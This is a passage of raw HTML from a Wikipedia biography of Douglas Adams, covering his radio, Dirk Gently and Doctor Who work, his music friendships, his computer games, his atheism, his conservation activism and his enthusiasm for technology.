The third series, <i><a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy_Tertiary_to_Quintessential_Phases#The_Tertiary_Phase\" title=\"The Hitchhiker's Guide to the Galaxy Tertiary to Quintessential Phases\">The Tertiary Phase</a></i>, was broadcast on <a href=\"/wiki/BBC_Radio_4\" title=\"BBC Radio 4\">BBC Radio 4</a> in September 2004 and was subsequently released on audio CD. Through edited recordings of Adams's own reading of <i>Life, the Universe and Everything</i>, he can be heard posthumously playing the part of Agrajag. <i>So Long, and Thanks for All the Fish</i> and <i>Mostly Harmless</i> made up the fourth and fifth radio series, respectively (on radio they were titled <i><a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy_Tertiary_to_Quintessential_Phases#The_Quandary_Phase\" title=\"The Hitchhiker's Guide to the Galaxy Tertiary to Quintessential Phases\">The Quandary Phase</a></i> and <i><a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy_Tertiary_to_Quintessential_Phases#The_Quintessential_Phase\" title=\"The Hitchhiker's Guide to the Galaxy Tertiary to Quintessential Phases\">The Quintessential Phase</a></i>); these were broadcast in May and June 2005, and also subsequently released on audio CD.
The last episode in the last series (with a new, \"more upbeat\" ending) concluded with, \"The very final episode of <i>The Hitchhiker's Guide to the Galaxy</i> by Douglas Adams is affectionately dedicated to its author.\"<sup id=\"cite_ref-22\" class=\"reference\"><a href=\"#cite_note-22\">[22]</a></sup></p>\n<h4><span class=\"mw-headline\" id=\"Dirk_Gently_series\"><i>Dirk Gently</i> series</span></h4>\n<div class=\"thumb tright\">\n<div class=\"thumbinner\" style=\"width:222px;\"><a href=\"/wiki/File:Douglas_Adams_San_Francisco.jpg\" class=\"image\"><img alt=\"\" src=\"//upload.wikimedia.org/wikipedia/commons/thumb/e/ee/Douglas_Adams_San_Francisco.jpg/220px-Douglas_Adams_San_Francisco.jpg\" width=\"220\" height=\"165\" class=\"thumbimage\" srcset=\"//upload.wikimedia.org/wikipedia/commons/thumb/e/ee/Douglas_Adams_San_Francisco.jpg/330px-Douglas_Adams_San_Francisco.jpg 1.5x, //upload.wikimedia.org/wikipedia/commons/thumb/e/ee/Douglas_Adams_San_Francisco.jpg/440px-Douglas_Adams_San_Francisco.jpg 2x\" data-file-width=\"1024\" data-file-height=\"768\" /></a>\n<div class=\"thumbcaption\">\n<div class=\"magnify\"><a href=\"/wiki/File:Douglas_Adams_San_Francisco.jpg\" class=\"internal\" title=\"Enlarge\"></a></div>\nAdams in March 2000</div>\n</div>\n</div>\n<p>In between Adams's first trip to Madagascar with <a href=\"/wiki/Mark_Carwardine\" title=\"Mark Carwardine\">Mark Carwardine</a> in 1985, and their series of travels that formed the basis for the radio series and non-fiction book <i><a href=\"/wiki/Last_Chance_to_See\" title=\"Last Chance to See\">Last Chance to See</a></i>, Adams wrote two other novels with a new cast of characters. 
<i><a href=\"/wiki/Dirk_Gently%27s_Holistic_Detective_Agency\" title=\"Dirk Gently's Holistic Detective Agency\">Dirk Gently's Holistic Detective Agency</a></i> was first published in 1987, and was described by its author as \"a kind of ghost-horror-detective-time-travel-romantic-comedy-epic, mainly concerned with mud, music and quantum mechanics\".<sup id=\"cite_ref-23\" class=\"reference\"><a href=\"#cite_note-23\">[23]</a></sup> It was derived from two Doctor Who serials Adams had written.</p>\n<p>A sequel novel, <i><a href=\"/wiki/The_Long_Dark_Tea-Time_of_the_Soul\" title=\"The Long Dark Tea-Time of the Soul\">The Long Dark Tea-Time of the Soul</a></i>, was published a year later. This was an entirely original work, Adams's first since <i>So Long, and Thanks for All the Fish.</i> After the book tour, Adams set off on his round-the-world excursion which supplied him with the material for <i>Last Chance to See</i>.</p>\n<h4><span class=\"mw-headline\" id=\"Doctor_Who\"><i>Doctor Who</i></span></h4>\n<div role=\"note\" class=\"hatnote\">Main article: <a href=\"/wiki/Doctor_Who\" title=\"Doctor Who\">Doctor Who</a></div>\n<p>Adams sent the script for the <i>HHGG</i> pilot radio programme to the <i>Doctor Who</i> production office in 1978, and was commissioned to write <i><a href=\"/wiki/The_Pirate_Planet\" title=\"The Pirate Planet\">The Pirate Planet</a></i> (see below). He had also previously attempted to submit a potential movie script, called \"Doctor Who and the Krikkitmen\", which later became his novel <i>Life, the Universe and Everything</i> (which in turn became the third <i>Hitchhiker's Guide</i> radio series). Adams then went on to serve as script editor on the show for its seventeenth season in 1979. 
Altogether, he wrote three <a href=\"/wiki/List_of_Doctor_Who_serials\" title=\"List of Doctor Who serials\"><i>Doctor Who</i> serials</a> starring <a href=\"/wiki/Tom_Baker\" title=\"Tom Baker\">Tom Baker</a> as <a href=\"/wiki/The_Doctor_(Doctor_Who)\" title=\"The Doctor (Doctor Who)\">the Doctor</a>:</p>\n<ul>\n<li>\"<a href=\"/wiki/The_Pirate_Planet\" title=\"The Pirate Planet\">The Pirate Planet</a>\" (the second serial in the \"<a href=\"/wiki/The_Key_to_Time\" class=\"mw-redirect\" title=\"The Key to Time\">Key to Time</a>\" arc, in <a href=\"/wiki/Doctor_Who_(season_16)\" class=\"mw-redirect\" title=\"Doctor Who (season 16)\">season 16</a>)</li>\n<li>\"<a href=\"/wiki/City_of_Death\" title=\"City of Death\">City of Death</a>\" (with producer <a href=\"/wiki/Graham_Williams_(television_producer)\" title=\"Graham Williams (television producer)\">Graham Williams</a>, from an original storyline by writer <a href=\"/wiki/David_Fisher_(writer)\" title=\"David Fisher (writer)\">David Fisher</a>. 
It was transmitted under the pseudonym \"<a href=\"/wiki/David_Agnew\" title=\"David Agnew\">David Agnew</a>\")</li>\n<li>\"<a href=\"/wiki/Shada\" class=\"mw-redirect\" title=\"Shada\">Shada</a>\" (only partially filmed; not televised due to <a href=\"/wiki/Strike_action\" title=\"Strike action\">industry disputes</a>)</li>\n</ul>\n<p>The episodes authored by Adams are some of the few that were not novelised as Adams would not allow anyone else to write them, and asked for a higher price than the publishers were willing to pay.<sup id=\"cite_ref-24\" class=\"reference\"><a href=\"#cite_note-24\">[24]</a></sup> \"Shada\" was later adapted as a novel by <a href=\"/wiki/Gareth_Roberts_(writer)\" title=\"Gareth Roberts (writer)\">Gareth Roberts</a> in 2012 and \"City of Death\" by <a href=\"/wiki/James_Goss_(producer)\" title=\"James Goss (producer)\">James Goss</a> in 2015.</p>\n<p>Adams was also known to allow in-jokes from <i>The Hitchhiker's Guide</i> to appear in the <i>Doctor Who</i> stories he wrote and other stories on which he served as Script Editor. Subsequent writers have also inserted <i>Hitchhiker's</i> references, even <a href=\"/wiki/The_Rings_of_Akhaten\" title=\"The Rings of Akhaten\">as recently as 2013</a>. Conversely, at least one reference to <i>Doctor Who</i> was worked into a <i>Hitchhiker's</i> novel. In <i><a href=\"/wiki/Life,_the_Universe_and_Everything\" title=\"Life, the Universe and Everything\">Life, the Universe and Everything</a></i>, two characters travel in time and land on the pitch at <a href=\"/wiki/Lord%27s_Cricket_Ground\" class=\"mw-redirect\" title=\"Lord's Cricket Ground\">Lord's Cricket Ground</a>. 
The reaction of the radio commentators to their sudden appearance is very similar to the reactions of commentators in a scene in the eighth episode of the 1965–66 story <i><a href=\"/wiki/The_Daleks%27_Master_Plan\" title=\"The Daleks' Master Plan\">The Daleks' Master Plan</a></i>, which has the Doctor's <a href=\"/wiki/TARDIS\" title=\"TARDIS\">TARDIS</a> <a href=\"/wiki/Materialization_(science_fiction)\" class=\"mw-redirect\" title=\"Materialization (science fiction)\">materialise</a> on the pitch at Lord's.</p>\n<p>Elements of <i>Shada</i> and <i>City of Death</i> were reused in Adams's later novel <i><a href=\"/wiki/Dirk_Gently%27s_Holistic_Detective_Agency\" title=\"Dirk Gently's Holistic Detective Agency\">Dirk Gently's Holistic Detective Agency</a></i>, in particular the character of <a href=\"/wiki/Professor_Chronotis\" title=\"Professor Chronotis\">Professor Chronotis</a>. <a href=\"/wiki/Big_Finish_Productions\" title=\"Big Finish Productions\">Big Finish Productions</a> eventually remade <i>Shada</i> as an audio play starring <a href=\"/wiki/Paul_McGann\" title=\"Paul McGann\">Paul McGann</a> as the Doctor. Accompanied by partially animated illustrations, it was <a href=\"/wiki/Doctor_Who_spin-offs#Webcasts\" title=\"Doctor Who spin-offs\">webcast</a> on the <a href=\"/wiki/BBC_Online\" title=\"BBC Online\">BBC website</a> in 2003, and subsequently released as a two-CD set later that year.
An omnibus edition of this version was broadcast on the digital radio station <a href=\"/wiki/BBC7\" class=\"mw-redirect\" title=\"BBC7\">BBC7</a> on 10 December 2005.</p>\n<p>In the <i>Doctor Who</i> 2012 Christmas episode <i><a href=\"/wiki/The_Snowmen#Production\" title=\"The Snowmen\">The Snowmen</a></i>, writer <a href=\"/wiki/Steven_Moffat\" title=\"Steven Moffat\">Steven Moffat</a> was inspired by a storyline that Adams pitched called <i>The Doctor Retires</i>.<sup id=\"cite_ref-25\" class=\"reference\"><a href=\"#cite_note-25\">[25]</a></sup></p>\n<p>While he was at school, he wrote and performed a play called <i>Doctor Which</i>.<sup id=\"cite_ref-Adams_xx_26-0\" class=\"reference\"><a href=\"#cite_note-Adams_xx-26\">[26]</a></sup></p>\n<h3><span class=\"mw-headline\" id=\"Music\">Music</span></h3>\n<p>Adams played the guitar left-handed and had a collection of twenty-four left-handed guitars when he died (having received his first guitar in 1964).
He also studied piano in the 1960s with the same teacher as <a href=\"/wiki/Paul_Wickens\" title=\"Paul Wickens\">Paul Wickens</a>, the pianist who plays in <a href=\"/wiki/Paul_McCartney\" title=\"Paul McCartney\">Paul McCartney</a>'s band (and composed the music for the 2004–2005 editions of the <i>Hitchhiker's Guide</i> radio series).<sup id=\"cite_ref-27\" class=\"reference\"><a href=\"#cite_note-27\">[27]</a></sup> <a href=\"/wiki/Pink_Floyd\" title=\"Pink Floyd\">Pink Floyd</a> and <a href=\"/wiki/Procol_Harum\" title=\"Procol Harum\">Procol Harum</a> were important influences on Adams's work.</p>\n<h4><span class=\"mw-headline\" id=\"Pink_Floyd\">Pink Floyd</span></h4>\n<p>Adams included a reference to <a href=\"/wiki/Pink_Floyd\" title=\"Pink Floyd\">Pink Floyd</a> in the original radio version of <i><a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy\" title=\"The Hitchhiker's Guide to the Galaxy\">The Hitchhiker's Guide to the Galaxy</a></i>, in which he describes the main characters surveying the landscape of an alien planet while Marvin, their android companion, hums Pink Floyd's \"<a href=\"/wiki/Shine_on_You_Crazy_Diamond\" class=\"mw-redirect\" title=\"Shine on You Crazy Diamond\">Shine on You Crazy Diamond</a>\" (Part 1). This was cut out of the CD version. Adams also compared the various noises that the <a href=\"/wiki/Kakapo\" title=\"Kakapo\">kakapo</a> makes to \"Pink Floyd studio out-takes\" in his non-fiction book on endangered species, <i><a href=\"/wiki/Last_Chance_to_See\" title=\"Last Chance to See\">Last Chance to See</a></i>.</p>\n<p>Adams's official biography shares its name with the song \"<a href=\"/wiki/Wish_You_Were_Here_(1975_song)\" class=\"mw-redirect\" title=\"Wish You Were Here (1975 song)\">Wish You Were Here</a>\" by Pink Floyd.
Adams was friends with Pink Floyd guitarist <a href=\"/wiki/David_Gilmour\" title=\"David Gilmour\">David Gilmour</a> and, on his 42nd birthday, was invited to make a guest appearance at Pink Floyd's concert of 28 October 1994 at Earls Court in London, playing guitar on the songs \"<a href=\"/wiki/Brain_Damage_(song)\" title=\"Brain Damage (song)\">Brain Damage</a>\" and \"<a href=\"/wiki/Eclipse_(song)\" title=\"Eclipse (song)\">Eclipse</a>\".<sup id=\"cite_ref-Mabbett-MM_28-0\" class=\"reference\"><a href=\"#cite_note-Mabbett-MM-28\">[28]</a></sup> Adams chose the name for Pink Floyd's 1994 album, <i><a href=\"/wiki/The_Division_Bell\" title=\"The Division Bell\">The Division Bell</a></i>, by picking the words from the lyrics to one of its tracks, \"High Hopes\".<sup id=\"cite_ref-Mabbett-MM_28-1\" class=\"reference\"><a href=\"#cite_note-Mabbett-MM-28\">[28]</a></sup> Gilmour also performed at Adams's memorial service in 2001, and at what would have been Adams's 60th birthday party in 2012.</p>\n<h4><span class=\"mw-headline\" id=\"Procol_Harum\">Procol Harum</span></h4>\n<p>Adams was a friend of <a href=\"/wiki/Gary_Brooker\" title=\"Gary Brooker\">Gary Brooker</a>, the lead singer, pianist and songwriter of <a href=\"/wiki/Procol_Harum\" title=\"Procol Harum\">Procol Harum</a>. Adams invited Brooker to one of the many parties that he held at his house. On one such occasion Brooker performed the full four-verse version of \"<a href=\"/wiki/A_Whiter_Shade_of_Pale\" title=\"A Whiter Shade of Pale\">A Whiter Shade of Pale</a>\". Brooker also performed at Adams's memorial service.</p>\n<p>Adams appeared on stage with Brooker to perform \"In Held 'Twas in I\" at Redhill when the band's lyricist <a href=\"/wiki/Keith_Reid\" title=\"Keith Reid\">Keith Reid</a> was not available. On several other occasions he introduced Procol Harum at their gigs.</p>\n<p>Adams would listen to music while writing, and this would occasionally influence his work.
On one occasion the title track from the Procol Harum album <i><a href=\"/wiki/Grand_Hotel_(album)\" title=\"Grand Hotel (album)\">Grand Hotel</a></i> was playing when</p>\n<blockquote class=\"templatequote\">\n<p>Suddenly in the middle of the song there was this huge orchestral climax that came out of nowhere and did not seem to be about anything. I kept wondering what was this huge thing happening in the background? And I eventually thought ... it sounds as if there ought to be some sort of floorshow going on. Something huge and extraordinary, like, well, like the end of the universe. And so that was where the idea for The Restaurant at the End of the Universe came from.</p>\n<div class=\"templatequotecite\"><cite>— Douglas Adams, Procol Harum at The Barbican<sup id=\"cite_ref-29\" class=\"reference\"><a href=\"#cite_note-29\">[29]</a></sup></cite></div>\n</blockquote>\n<h3><span class=\"mw-headline\" id=\"Computer_games_and_projects\">Computer games and projects</span></h3>\n<p>Douglas Adams created an <a href=\"/wiki/Interactive_fiction\" title=\"Interactive fiction\">interactive fiction</a> version of <i><a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy_(computer_game)\" class=\"mw-redirect\" title=\"The Hitchhiker's Guide to the Galaxy (computer game)\">HHGG</a></i> with <a href=\"/wiki/Steve_Meretzky\" title=\"Steve Meretzky\">Steve Meretzky</a> from <a href=\"/wiki/Infocom\" title=\"Infocom\">Infocom</a> in 1984. In 1986 he participated in a week-long brainstorming session with the <a href=\"/wiki/Lucasfilm_Games\" class=\"mw-redirect\" title=\"Lucasfilm Games\">Lucasfilm Games</a> team for the game <i><a href=\"/wiki/Labyrinth:_The_Computer_Game\" title=\"Labyrinth: The Computer Game\">Labyrinth</a></i>. 
Later he was also involved in creating <i><a href=\"/wiki/Bureaucracy_(computer_game)\" class=\"mw-redirect\" title=\"Bureaucracy (computer game)\">Bureaucracy</a></i> (also by Infocom, but not based on any book; Adams wrote it as a parody of events in his own life).</p>\n<p>Adams was a founder-director and Chief Fantasist of <a href=\"/wiki/The_Digital_Village\" title=\"The Digital Village\">The Digital Village</a>, a digital media and Internet company with which he created <i><a href=\"/wiki/Starship_Titanic\" title=\"Starship Titanic\">Starship Titanic</a></i>, a <a href=\"/wiki/Codie\" class=\"mw-redirect\" title=\"Codie\">Codie</a> Award-winning and <a href=\"/wiki/BAFTA#Games_Awards\" class=\"mw-redirect\" title=\"BAFTA\">BAFTA-nominated adventure game</a>, which was published in 1998 by <a href=\"/wiki/Simon_%26_Schuster\" title=\"Simon & Schuster\">Simon & Schuster</a>.<sup id=\"cite_ref-bbc.co.uk_30-0\" class=\"reference\"><a href=\"#cite_note-bbc.co.uk-30\">[30]</a></sup><sup id=\"cite_ref-31\" class=\"reference\"><a href=\"#cite_note-31\">[31]</a></sup> <a href=\"/wiki/Terry_Jones\" title=\"Terry Jones\">Terry Jones</a> wrote the accompanying book, entitled <i>Douglas Adams Starship Titanic</i>, since Adams was too busy with the computer game to do both. In April 1999, Adams initiated the <a href=\"/wiki/H2g2\" title=\"H2g2\">h2g2</a> <a href=\"/wiki/Collaborative_writing\" title=\"Collaborative writing\">collaborative writing</a> project, an experimental attempt at making <i>The Hitchhiker's Guide to the Galaxy</i> a reality, and at harnessing the collective brainpower of the internet community. 
It found a new home at BBC Online in 2001.<sup id=\"cite_ref-bbc.co.uk_30-1\" class=\"reference\"><a href=\"#cite_note-bbc.co.uk-30\">[30]</a></sup></p>\n<p>In 1990 Adams wrote and presented a television documentary programme <i><a href=\"/wiki/Hyperland\" title=\"Hyperland\">Hyperland</a></i><sup id=\"cite_ref-32\" class=\"reference\"><a href=\"#cite_note-32\">[32]</a></sup> which featured <a href=\"/wiki/Tom_Baker\" title=\"Tom Baker\">Tom Baker</a> as a \"software agent\" (similar to the assistant pictured in Apple's <a href=\"/wiki/Knowledge_Navigator\" title=\"Knowledge Navigator\">Knowledge Navigator</a> video of future concepts from 1987), and interviews with <a href=\"/wiki/Ted_Nelson\" title=\"Ted Nelson\">Ted Nelson</a>, the co-inventor of <a href=\"/wiki/Hypertext\" title=\"Hypertext\">hypertext</a> and the person who coined the term. Although Adams did not invent hypertext, he was an <a href=\"/wiki/Early_adopter\" title=\"Early adopter\">early adopter</a> and advocate of it. This was the same year in which <a href=\"/wiki/Tim_Berners-Lee\" title=\"Tim Berners-Lee\">Tim Berners-Lee</a> was building the idea of hypertext into his new <a href=\"/wiki/HTML\" title=\"HTML\">HTML</a>.</p>\n<h2><span class=\"mw-headline\" id=\"Personal_beliefs_and_activism\">Personal beliefs and activism</span></h2>\n<h3><span class=\"mw-headline\" id=\"Atheism_and_views_on_religion\">Atheism and views on religion</span></h3>\n<p>Adams described himself as a \"radical <a href=\"/wiki/Atheist\" class=\"mw-redirect\" title=\"Atheist\">atheist</a>\", adding <i>radical</i> for emphasis so he would not be asked if he meant agnostic. He told <a href=\"/wiki/American_Atheists\" title=\"American Atheists\">American Atheists</a> that this made things easier, but most importantly it conveyed the fact that he really meant it. \"I am convinced that there is not a god,\" he said.
He imagined a <a href=\"/wiki/Fine-tuned_Universe#In_popular_culture\" title=\"Fine-tuned Universe\">sentient puddle</a> who wakes up one morning and thinks, \"This is an interesting world I find myself in – an interesting hole I find myself in – fits me rather neatly, doesn't it? In fact it fits me staggeringly well, must have been made to have me in it!\" to demonstrate his view that the <a href=\"/wiki/Fine-tuned_Universe\" title=\"Fine-tuned Universe\">fine-tuned Universe</a> argument for God was a fallacy.<sup id=\"cite_ref-33\" class=\"reference\"><a href=\"#cite_note-33\">[33]</a></sup></p>\n<p>Despite this, he remained fascinated by religion because of its effect on human affairs. \"I love to keep poking and prodding at it. I've thought about it so much over the years that that fascination is bound to spill over into my writing.\"<sup id=\"cite_ref-amath_34-0\" class=\"reference\"><a href=\"#cite_note-amath-34\">[34]</a></sup></p>\n<p>The evolutionary biologist and atheist <a href=\"/wiki/Richard_Dawkins\" title=\"Richard Dawkins\">Richard Dawkins</a> uses Adams's influence throughout to exemplify arguments for non-belief in his 2006 book <i><a href=\"/wiki/The_God_Delusion\" title=\"The God Delusion\">The God Delusion</a></i>. 
Dawkins dedicated the book to Adams, whom he jokingly called \"possibly [my] only convert\" to atheism<sup id=\"cite_ref-TheGuardian_35-0\" class=\"reference\"><a href=\"#cite_note-TheGuardian-35\">[35]</a></sup> and wrote on his death that \"Science has lost a friend, literature has lost a luminary, the <a href=\"/wiki/Mountain_gorilla\" title=\"Mountain gorilla\">mountain gorilla</a> and the <a href=\"/wiki/Black_rhino\" class=\"mw-redirect\" title=\"Black rhino\">black rhino</a> have lost a gallant defender.\"<sup id=\"cite_ref-Dawkins2001_36-0\" class=\"reference\"><a href=\"#cite_note-Dawkins2001-36\">[36]</a></sup></p>\n<h3><span class=\"mw-headline\" id=\"Environmental_activism\">Environmental activism</span></h3>\n<p>Adams was also an <a href=\"/wiki/Environmental_activist\" class=\"mw-redirect\" title=\"Environmental activist\">environmental activist</a> who campaigned on behalf of <a href=\"/wiki/Endangered_species\" title=\"Endangered species\">endangered species</a>. This activism included the production of the non-fiction radio series <i><a href=\"/wiki/Last_Chance_to_See\" title=\"Last Chance to See\">Last Chance to See</a></i>, in which he and <a href=\"/wiki/Natural_history\" title=\"Natural history\">naturalist</a> <a href=\"/wiki/Mark_Carwardine\" title=\"Mark Carwardine\">Mark Carwardine</a> visited rare species such as the <a href=\"/wiki/Kakapo\" title=\"Kakapo\">kakapo</a> and <a href=\"/wiki/Chinese_river_dolphin\" class=\"mw-redirect\" title=\"Chinese river dolphin\">baiji</a>, and the publication of a tie-in book of the same name. 
In 1992 this was made into a CD-ROM combination of <a href=\"/wiki/Audiobook\" title=\"Audiobook\">audiobook</a>, <a href=\"/wiki/E-book\" title=\"E-book\">e-book</a> and picture slide show.</p>\n<p>Adams and Mark Carwardine contributed the 'Meeting a Gorilla' passage from <i><a href=\"/wiki/Last_Chance_to_See\" title=\"Last Chance to See\">Last Chance to See</a></i> to the book <i><a href=\"/wiki/Great_Ape_Project\" title=\"Great Ape Project\">The Great Ape Project</a></i>.<sup id=\"cite_ref-37\" class=\"reference\"><a href=\"#cite_note-37\">[37]</a></sup> This book, edited by <a href=\"/wiki/Paola_Cavalieri\" title=\"Paola Cavalieri\">Paola Cavalieri</a> and <a href=\"/wiki/Peter_Singer\" title=\"Peter Singer\">Peter Singer</a>, launched a wider-scale project in 1993, which calls for the extension of moral equality to include all great apes, human and non-human.</p>\n<p>In 1994 he participated in a climb of <a href=\"/wiki/Mount_Kilimanjaro\" title=\"Mount Kilimanjaro\">Mount Kilimanjaro</a> while wearing a rhino suit for the British charity organisation <i><a href=\"/wiki/Save_the_Rhino\" title=\"Save the Rhino\">Save the Rhino International</a></i>. Puppeteer <a href=\"/wiki/William_Todd-Jones\" title=\"William Todd-Jones\">William Todd-Jones</a>, who had originally worn the suit in the London Marathon to raise money and bring awareness to the group, also participated in the climb wearing a rhino suit; Adams wore the suit while travelling to the mountain before the climb began. About £100,000 was raised through that event, benefiting schools in <a href=\"/wiki/Kenya\" title=\"Kenya\">Kenya</a> and a <a href=\"/wiki/Black_rhinoceros\" title=\"Black rhinoceros\">black rhinoceros</a> preservation programme in <a href=\"/wiki/Tanzania\" title=\"Tanzania\">Tanzania</a>. 
Adams was also an active supporter of the <i><a href=\"/wiki/Dian_Fossey\" title=\"Dian Fossey\">Dian Fossey</a> Gorilla Fund</i>.</p>\n<p>Since 2003, <i>Save the Rhino</i> has held an annual Douglas Adams Memorial Lecture around the time of his birthday to raise money for environmental campaigns.<sup id=\"cite_ref-38\" class=\"reference\"><a href=\"#cite_note-38\">[38]</a></sup> The lectures in the series are:</p>\n<ul>\n<li>2003 <a href=\"/wiki/Richard_Dawkins\" title=\"Richard Dawkins\">Richard Dawkins</a> – <i>Queerer than we can suppose: the strangeness of science</i></li>\n<li>2004 <a href=\"/wiki/Robert_Swan\" title=\"Robert Swan\">Robert Swan</a> – <i>Mission Antarctica</i></li>\n<li>2005 <a href=\"/wiki/Mark_Carwardine\" title=\"Mark Carwardine\">Mark Carwardine</a> – <i>Last Chance to See... Just a bit more</i></li>\n<li>2006 <a href=\"/wiki/Robert_Winston\" title=\"Robert Winston\">Robert Winston</a> – <i>Is the Human an Endangered Species?</i></li>\n<li>2007 <a href=\"/wiki/Richard_Leakey\" title=\"Richard Leakey\">Richard Leakey</a> – <i>Wildlife Management in East Africa – Is there a future?</i></li>\n<li>2008 <a href=\"/wiki/Steven_Pinker\" title=\"Steven Pinker\">Steven Pinker</a> – <i>The Stuff of Thought, Language as a Window into Human Nature</i></li>\n<li>2009 <a href=\"/wiki/Benedict_Allen\" title=\"Benedict Allen\">Benedict Allen</a> – <i>Unbreakable</i></li>\n<li>2010 <a href=\"/wiki/Marcus_du_Sautoy\" title=\"Marcus du Sautoy\">Marcus du Sautoy</a> – <i>42: the answer to life, the universe and prime numbers</i></li>\n<li>2011 <a href=\"/wiki/Brian_Cox_(physicist)\" title=\"Brian Cox (physicist)\">Brian Cox</a> – <i>The Universe and Why We Should Explore It</i></li>\n<li>2012 Lecture replaced by \"Douglas Adams The Party\"<sup id=\"cite_ref-39\" class=\"reference\"><a href=\"#cite_note-39\">[39]</a></sup></li>\n<li>2013 <a href=\"/wiki/Adam_Rutherford\" title=\"Adam Rutherford\">Adam Rutherford</a> – <i>Creation: the origin and the future of 
life</i><sup id=\"cite_ref-40\" class=\"reference\"><a href=\"#cite_note-40\">[40]</a></sup></li>\n<li>2014 <a href=\"/wiki/Roger_Highfield\" title=\"Roger Highfield\">Roger Highfield</a> and <a href=\"/wiki/Simon_Singh\" title=\"Simon Singh\">Simon Singh</a> – <i>The Science of Harry Potter and the Mathematics of The Simpsons</i><sup id=\"cite_ref-41\" class=\"reference\"><a href=\"#cite_note-41\">[41]</a></sup></li>\n<li>2015 <a href=\"/wiki/Neil_Gaiman\" title=\"Neil Gaiman\">Neil Gaiman</a> – <i>Immortality and Douglas Adams</i><sup id=\"cite_ref-42\" class=\"reference\"><a href=\"#cite_note-42\">[42]</a></sup></li>\n<li>2016 <a href=\"/wiki/Alice_Roberts\" title=\"Alice Roberts\">Alice Roberts</a> – <i>Survivors of the Ice Age</i><sup id=\"cite_ref-43\" class=\"reference\"><a href=\"#cite_note-43\">[43]</a></sup></li>\n</ul>\n<h3><span class=\"mw-headline\" id=\"Technology_and_innovation\">Technology and innovation</span></h3>\n<p>Adams bought his first <a href=\"/wiki/Word_processor\" title=\"Word processor\">word processor</a> in 1982, having considered one as early as 1979. His first purchase was a 'Nexus'. In 1983, when he and Jane Belson went out to Los Angeles, he bought a <a href=\"/wiki/Digital_Equipment_Corporation\" title=\"Digital Equipment Corporation\">DEC</a> <a href=\"/wiki/Rainbow_100\" title=\"Rainbow 100\">Rainbow</a>. 
Upon their return to England, Adams bought an <a href=\"/wiki/Apricot_Computers\" title=\"Apricot Computers\">Apricot</a>, then a <a href=\"/wiki/BBC_Micro\" title=\"BBC Micro\">BBC Micro</a> and a <a href=\"/wiki/Tandy_1000\" title=\"Tandy 1000\">Tandy 1000</a>.<sup id=\"cite_ref-Simpson_184-185_44-0\" class=\"reference\"><a href=\"#cite_note-Simpson_184-185-44\">[44]</a></sup> In <i><a href=\"/wiki/Last_Chance_to_See\" title=\"Last Chance to See\">Last Chance to See</a></i> Adams mentions his <a href=\"/wiki/Cambridge_Z88\" title=\"Cambridge Z88\">Cambridge Z88</a>, which he had taken to <a href=\"/wiki/Zaire\" title=\"Zaire\">Zaire</a> on a quest to find the <a href=\"/wiki/Northern_white_rhinoceros\" title=\"Northern white rhinoceros\">northern white rhinoceros</a>.<sup id=\"cite_ref-45\" class=\"reference\"><a href=\"#cite_note-45\">[45]</a></sup></p>\n<p>Adams's posthumously published work, <i><a href=\"/wiki/The_Salmon_of_Doubt\" title=\"The Salmon of Doubt\">The Salmon of Doubt</a></i>, features multiple articles by him on the subject of technology, including reprints of articles that originally ran in <i><a href=\"/wiki/MacUser\" title=\"MacUser\">MacUser</a></i> magazine, and in <i><a href=\"/wiki/The_Independent_on_Sunday\" class=\"mw-redirect\" title=\"The Independent on Sunday\">The Independent on Sunday</a></i> newspaper. In these Adams claims that one of the first computers he ever saw was a <a href=\"/wiki/Commodore_PET\" title=\"Commodore PET\">Commodore PET</a>, and that he has \"adored\" his Apple Macintosh (\"or rather my family of however many Macintoshes it is that I've recklessly accumulated over the years\") since he first saw one at Infocom's offices in Boston in 1984.<sup id=\"cite_ref-46\" class=\"reference\"><a href=\"#cite_note-46\">[46]</a></sup></p>\n<p>Adams was a Macintosh user from the time they first came out in 1984 until his death in 2001. 
He was reportedly the first person to buy a Mac in Europe, the second being <a href=\"/wiki/Stephen_Fry\" title=\"Stephen Fry\">Stephen Fry</a> – though accounts differ, with some saying Fry bought his first; Fry himself claims he was second to Adams.<sup id=\"cite_ref-47\" class=\"reference\"><a href=\"#cite_note-47\">[47]</a></sup> Adams was also an \"<a href=\"/wiki/AppleMasters\" title=\"AppleMasters\">Apple Master</a>\", one of several celebrities whom Apple made into spokespeople for its products (other Apple Masters included <a href=\"/wiki/John_Cleese\" title=\"John Cleese\">John Cleese</a> and <a href=\"/wiki/Gregory_Hines\" title=\"Gregory Hines\">Gregory Hines</a>). Adams's contributions included a rock video that he created using the first version of <a href=\"/wiki/IMovie\" title=\"IMovie\">iMovie</a> with footage featuring his daughter Polly. The video was available on Adams's <a href=\"/wiki/.Mac\" class=\"mw-redirect\" title=\".Mac\">.Mac</a> homepage. Adams installed and started using the first release of <a href=\"/wiki/Mac_OS_X\" class=\"mw-redirect\" title=\"Mac OS X\">Mac OS X</a> in the weeks leading up to his death. His very last post to his own forum was in praise of Mac OS X and the possibilities of its <a href=\"/wiki/Cocoa_(API)\" title=\"Cocoa (API)\">Cocoa</a> programming framework. 
He said it was \"awesome...\", which was also the last word he wrote on his site.<sup id=\"cite_ref-48\" class=\"reference\"><a href=\"#cite_note-48\">[48]</a></sup></p>\n<p>Adams used e-mail extensively long before it reached popular awareness, using it to correspond with <a href=\"/wiki/Steve_Meretzky\" title=\"Steve Meretzky\">Steve Meretzky</a> during the pair's collaboration on Infocom's version of <i><a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy_(computer_game)\" class=\"mw-redirect\" title=\"The Hitchhiker's Guide to the Galaxy (computer game)\">The Hitchhiker's Guide to the Galaxy</a></i>.<sup id=\"cite_ref-Simpson_184-185_44-1\" class=\"reference\"><a href=\"#cite_note-Simpson_184-185-44\">[44]</a></sup> While living in New Mexico in 1993 he set up another e-mail address and began posting to his own <a href=\"/wiki/USENET\" class=\"mw-redirect\" title=\"USENET\">USENET</a> newsgroup, alt.fan.douglas-adams, and occasionally, when his computer was acting up, to the comp.sys.mac hierarchy.<sup id=\"cite_ref-49\" class=\"reference\"><a href=\"#cite_note-49\">[49]</a></sup> Many of his posts are now archived through Google. Challenges to the authenticity of his messages later led Adams to set up a message forum on his own website to avoid the issue. In 1996, Adams was a keynote speaker at The <a href=\"/wiki/Microsoft\" title=\"Microsoft\">Microsoft</a> <a 